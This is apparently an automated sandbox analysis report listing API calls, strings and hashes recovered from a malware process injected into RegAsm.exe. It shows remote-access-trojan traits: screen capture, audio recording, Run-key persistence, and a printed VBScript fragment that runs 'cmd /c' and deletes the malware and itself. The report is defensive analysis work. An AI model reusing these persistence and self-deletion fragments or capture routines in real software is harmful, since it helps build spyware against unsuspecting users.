                                                                        • API String ID: 1084509184-3316369744
                                                                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                        • String ID: lJD
                                                                        • API String ID: 1084509184-3316369744
                                                                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: GetLocaleInfoEx
                                                                        • API String ID: 2299586839-2904428671
                                                                        • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                                        • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                        • String ID:
                                                                        • API String ID: 1663032902-0
                                                                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                        • String ID:
                                                                        • API String ID: 2692324296-0
                                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                                        APIs
                                                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                        • String ID:
                                                                        • API String ID: 1272433827-0
                                                                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                        • String ID:
                                                                        • API String ID: 1084509184-0
                                                                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                        APIs
                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                        • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                        • GetIconInfo.USER32 ref: 00418FBD
                                                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                        • DeleteDC.GDI32(?), ref: 0041917C
                                                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                                                        • DeleteDC.GDI32(?), ref: 00419258
                                                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                        • String ID: DISPLAY
                                                                        • API String ID: 4256916514-865373369
                                                                        • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                        • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                        APIs
                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,`2U,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                        • API String ID: 1861856835-332907002
                                                                        • Opcode ID: d6bdc6585a4e4fb30af1d5b39ccbf0b4685936c32e7406392716d295adf9b9e3
                                                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                        • Opcode Fuzzy Hash: d6bdc6585a4e4fb30af1d5b39ccbf0b4685936c32e7406392716d295adf9b9e3
                                                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                        APIs
                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,`2U,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63A21986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                        • ExitProcess.KERNEL32 ref: 0040D419
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`2U$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                        • API String ID: 3797177996-3565920307
                                                                        • Opcode ID: 05e3ec18fa8463a6322569f1bb3c1d7af6336844a107ad2f8429c4fb3964e9d7
                                                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                        • Opcode Fuzzy Hash: 05e3ec18fa8463a6322569f1bb3c1d7af6336844a107ad2f8429c4fb3964e9d7
                                                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,@5U,00000003), ref: 00412494
                                                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                        • lstrcatW.KERNEL32 ref: 00412601
                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                        • String ID: .exe$8SG$@5U$WDH$exepath$open$temp_
                                                                        • API String ID: 2649220323-645615128
                                                                        • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                        • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                        APIs
                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                        • SetEvent.KERNEL32 ref: 0041B219
                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                        • API String ID: 738084811-2094122233
                                                                        • Opcode ID: c2dffa3932ea448a70c857dca7e5090a6bd86c42919e5ddd10193c91cbe91aa0
                                                                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                        • Opcode Fuzzy Hash: c2dffa3932ea448a70c857dca7e5090a6bd86c42919e5ddd10193c91cbe91aa0
                                                                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Write$Create
                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                        • API String ID: 1602526932-4212202414
                                                                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,`2U,004076CE), ref: 00407284
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
